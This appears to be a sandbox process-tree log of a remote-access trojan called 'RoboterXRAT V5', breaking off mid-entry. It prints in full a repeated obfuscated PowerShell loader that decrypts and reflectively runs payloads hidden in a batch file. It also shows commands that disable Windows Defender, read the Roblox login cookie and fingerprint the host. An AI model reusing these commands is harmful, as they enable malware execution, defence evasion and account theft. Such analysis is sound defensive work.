        21⤵
        
        PID:3512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:788
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        
        PID:5712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        18⤵
        
        PID:3572
        
        C:\Windows\system32\net.exe
        
        net file
        19⤵
        
        PID:2020
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        20⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:5108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        17⤵
        
        PID:5468
        
        C:\Windows\system32\net.exe
        
        net file
        18⤵
        
        PID:3588
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        19⤵
        
        PID:908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:2312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        16⤵
        
        PID:1676
        
        C:\Windows\system32\net.exe
        
        net file
        17⤵
        
        PID:5840
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        18⤵
        
        PID:5508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:5532
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:3392
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        Views/modifies file attributes
        
        PID:984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        18⤵
        
        PID:4752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:6020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:4400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:4076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:2796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:4712
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4508
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        15⤵
        
        PID:5484
        
        C:\Windows\system32\net.exe
        
        net file
        16⤵
        
        PID:4248
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        17⤵
        
        PID:2072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        16⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:6048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        14⤵
        
        PID:5536
        
        C:\Windows\system32\net.exe
        
        net file
        15⤵
        
        PID:4400
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        16⤵
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:5184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        13⤵
        
        PID:1420
        
        C:\Windows\system32\net.exe
        
        net file
        14⤵
        
        PID:3476
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        15⤵
        
        PID:4812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:5616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        12⤵
        
        PID:4076
        
        C:\Windows\system32\net.exe
        
        net file
        13⤵
        
        PID:5668
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        14⤵
        
        PID:4632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        13⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:5728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        11⤵
        
        PID:5244
        
        C:\Windows\system32\net.exe
        
        net file
        12⤵
        
        PID:5320
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        13⤵
        
        PID:4632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
